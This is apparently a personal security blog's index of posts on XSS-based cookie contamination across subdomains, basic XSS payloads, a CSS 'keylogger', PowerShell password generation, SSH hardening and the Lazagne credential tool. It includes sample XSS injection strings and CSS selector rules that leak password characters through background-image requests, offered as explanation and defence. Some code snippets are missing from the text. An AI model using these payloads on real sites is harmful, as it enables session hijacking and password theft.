security web

Cross domain cookie contamination

TLDR: XSS attacks can be used to set cookies for sub domains that share the same top level domain. This increases the scope of XSS attacks.

In a cloud world; several applications are hosted under the same top level domain. An organization can have hostnames such as:

  • corporate landing page
  • webmail
  • internal resources .
  • web store.

Since they all share the same top level domain, an XSS vulnerability could help an setting domain wide cookies. Domain-wide cookies are inherited by all sub domains, so it could contaminate cookie values of other sub domains.

The “attack”

There are two main scenarios, both using, which has an exploitable XSS attack, and, which uses cookies for session management. An attacker exploits a victim using the XSS vuln, but instead of doing the obvious cookie stealing or DOM manipulation (on, he can set arbitrary cookies for the entire domain; including If he’d execute something like:


He could successfully “log in” the victim onto an arbitrary account, alter settings or even CSRF tokens.


If a host, such as has a cookie set already, the browser (FF under u18.04 at least, testing others) will present both cookies. I’m currently figuring out what different frameworks to when several cookies are presented with the same name.

This may prove for interesting attacks, especially for applications that are hosted on a “more critical” top level domain, or are “shared” across cloud providers.


Not a fool proof solution, but you probably want to move away from storing values in cookies that can dictate a particular state, unless it can be validated (signature, …), or host applications of different “value” off different top level domains.

If you have a JavaScript rich application, and you handle authentication (api calls, etc) with tokens that you store in cookies; you may want to opt for localStorage or sessionStorage, rather than HTTP cookies.

And of course, don’t host applications with XSS. 🙂


The revival of (cross site) script kiddies.

First off, a Happy 2019!

Being in charge of adjudicating Microsoft’s Cloud Bug Bounty; we see many “low hanging fruit” XSS bugs coming through. While we have tools that catch these bugs, sometimes they slip through the cracks. Also, since machines won’t find every.single.bug.ever; we pay out for interesting bugs, and bump up payouts for high quality reports. Sadly though, many of these bugs make us utter a “how come our tools didn’t catch this?”, rather than a “wow, that’s an interesting approach!”. Needless to say, the latter would get higher payouts.

XSS 101

I hope most of you know cross site scripting (XSS). If you can inject active content (we mean JavaScript, 9 out of 10) into a page that, preferably others will see, you have cross site scripting. There may be other nuances to this, but that’s generally my approach. The best way of showing these; is to perform an

which will display the current context’s domain. Showing the current domain, rather than a “123”, “foo” or “pwnage!!1!” message, clearly shows which domain’s DOM, you have access to. In the world of embedded iframes, that shows to be useful.


Most XSS payloads, and there are several out there, are designed to be injected in a page’s DOM. Since the application you’re targeting may be prefixing some controls, you may have to close a previous tag. The tainted data may be included as an HTML attribute, as part of of a JS script block or just as general HTML content. For these, a payload like:

  • ” onmouseover=”alert(123)
  • “; alert(123); var foo=”
  • </textarea><script>alert(123);</script>

May have to come in effect. Needless to say, that list is endless.


Being on the receiver side of bug bounty submissions, and spending several evenings in HTTP access_log or W3SVC1 log files performing pattern analysis, I see a significant higher breadth than depth. Meaning, that many will try a vanilla <script>alert(123)</script> payload, rather than following how the data ends up in the DOM. Missing out on bugs, and payouts.

So for that, I’d ask that if you find yourself mindlessly copy pasting XSS payloads in each field, don’t see the absence of a alert dialog box as a binary (“the site is not vulnerable”), maybe you just need to perform some taint analysis and try again.


Create random passwords with PowerShell

A task I see myself do occasionally, is to generate a password or other symmetric secret. Of course, to avoid things like “Azure123!” and even going against battery horse stable mechanisms, I like to generate random strings; and store these in a password vault. Either online, or local.

At work, I (have to) use PowerShell quite a bit, so I use the following line to come up with a 20 char random password, containing digits, upper- and lowercase alphanumeric characters:

-join ((48..57)+(65..90)+(97..122) | Get-Random -count 20 | %{[char]$_ })

If you need to include special chars, I typically tend to add (!, #, *, -, @ and ~) to the mix, since they’re unlikely to have a special meaning to an underlying system. Their corresponding ASCII values can be added simple:

-join ((33,35,42,45,64,126)+(48..57)+(65..90)+(97..122) | Get-Random -count 36 | %{[char]$_ })

CSS keyloggers, hype and/or impact

A few days ago, I stumbled across one of the videos of LiveOverflow, where he discusses a so called “CSS keylogger” (github), its impact and novelty.

While there’s nothing new about the attack (it was reported several years ago, yet it popped up again on YCombinator’s HackerNews), I guess it trigger LiveOverflow to make the video.

This “attack”, where CSS is being abuse by altering an object’s background, based on its content; allows it to dubbed as a keylogger. Although, rightfully in his video, keyloggers usually capture keystrokes system wide. As a TLDR; the attack basically works like this:

input[type="password"][value&="a"]{ background-image: url( }
input[type="password"][value&="b"]{ background-image: url( }
input[type="password"][value&="aa"]{ background-image: url( }
input[type="password"][value&="ab"]{ background-image: url( }

The problem, as pointed out too, is that you need a CSS file that’s several megabytes, and potentially has every password in the book (since they don’t get triggered per keystroke, only on the full value), which – when exploited with an HTML injection attack – may not be very feasible and realistic.

One thing that would make this possible though. If you rely on external hosts to host your CSS files, such as CDN (or referenced with an @import rule), you could have a malicious CDN that hosts a pseudo keylogging CSS. Also, while provisioning a file with all passwords may be difficult, any input with a limited key space may be a good target for this attack. PIN codes, or 2FA numeric challenge requests come to mind.

Since people are usually a bit wary where they host their JavaScript files (XSS attacks, etc) – CSS is generally a bit more relaxed.

Ensure that; if you deal with sensitive user input; to host your CSS files in a trusted environment. For defense in depth, you can include a Content Security Policy header that will only allow CSS hosting from whitelisted sources.


Washington State

So, while since I last updated this blog – bad habit of mine. So, I moved a while ago to Washington State, to be closer to work. Still setting everything up, all the usual issues that happen when moving countries, but yay! New places to visit, new people to meet, new things to do!


Nullcon 2017

A few months ago, I was asked to speak at Nullcon 2017, which concluded a few weeks ago. It was very well setup conference, and it attracts a lot of the security community in the Indian subcontinent. A pleasure to speak at, and I’d be happy to do it again in Goa 2018.

I presented how to sign up to Microsoft Azure, in order to find security vulnerabilities in it for our Azure Bug Bounty program. We presented together with Facebook, Google, BugCrowd and HackerOne to entice the community to participate in Bug Bounties.

Anyway, a quick thank you to the organizers, and hope to see you all in 2018 in beautiful, sunny Goa!


The lost art of penetration testing

Just a little rant.
Often, if a security consultant is asked to perform asked to perform a VA/PT (the difference is a whole topic for another day) for a customer in a number of man-days. Obviously, as with most service based deliverables, one quantifies work in the time spent on it. Hours, or -more often- days. But this creates a false sense of security. Time spent is not the right yardstick.

When dealing with a business deadline (i.e: the app needs to be released today, the new portal needs to be pushed next week, …), we often compromise on security; and treat the security audit, or va/pt if you like, as a checkbox:

oh, no critical and/or highs? we’re good to go. We’ll fix the rest later

And that is bad for two reasons:

  • The rest is never fixed
  • You’re ‘protected’ against whoever spends X amount of time on it

This is, in my opinion, why programs such as Bug Bounty programs are so effective, and essential for any organization. Yes, you’re tongue-in-cheek giving attackers the green light to assess your security, but you equally get an assessment 24/7, not limited on time.

After joining Microsoft, I’ve been very involved in some of the Bug Bounty programs MSFT offers, and most of the “juicy bugs” (the real eye openers) are the result of days, weeks and sometimes even months of testing, failing, and retesting.

If you have internal (technical) information security staff, embrace the notion of continuous testing. Yes, some properties need to have a checkbox being assessed before going life, but don’t let anyone stop there. If you don’t have the internal muscle power, embrace a bug bounty program. There are several clever minds out there who would uncover sometimes hard- to find bugs, because they like doing so.


Post exploitation tools: Lazagne

lasagnaOften, after a compromise of a machine, red teams / adversaries search for certificates or credentials to hop to other machines, often referred to as “lateral movement”. When doing so, many use Mimikatz, a tool that extracts credentials, PIN codes and kerberos tickets from memory. There are countless blog articles about how to detect it, and hide it from AV, etc.

But another nifty tool, that many don’t know about is Lazagne. It searches for credentials in files and registry. Not just your windows credentials, but things you save in your browsers, mail clients, FTP clients, keyrings etc.

security sysadmin

Quick SSH security tips

Just a quick post about a page I stumbled across, and I merely want to keep it in bookmarks. I was talking to some people to secure public facing SSH servers; and while we have the obvious:

  • Only allows SSH2
  • Disable root logins
  • Use keypairs instead of passwords
  • Implement fail2ban

When researching to make internet exposed SSH boxes more secure, I’ve been implementing recently MFA (Multi Factor Authentication). Usually found when you use something you know (password, PIN, …) and something you have (smartcard, keyfob, mobile, mobile app, …). In SSH, this can be achieved with the following; it forces you to authenticate with your keypair AND your password.

Match User johndoe
    AuthenticationMethods publickey,keyboard-interactive

This, and more tips were found on, so check it out.


Testing phishing scenario’s

fishWhen I joined my company, I was asked to perform a few social engineering assessments for private and government customers alike. Previously, the assessment being done were more testing the amount of people that would click a link in a spoofed e-mail, regardless of the damage. But I wanted to step things up a bit, as I believe that phishing is often a very underrated risk, which seems to be quite effective.

Although “social engineering” is much more than phishing, we are generally asked to keep it to phishing attacks alone. We use following scenario’s to quantify the risk:
read more »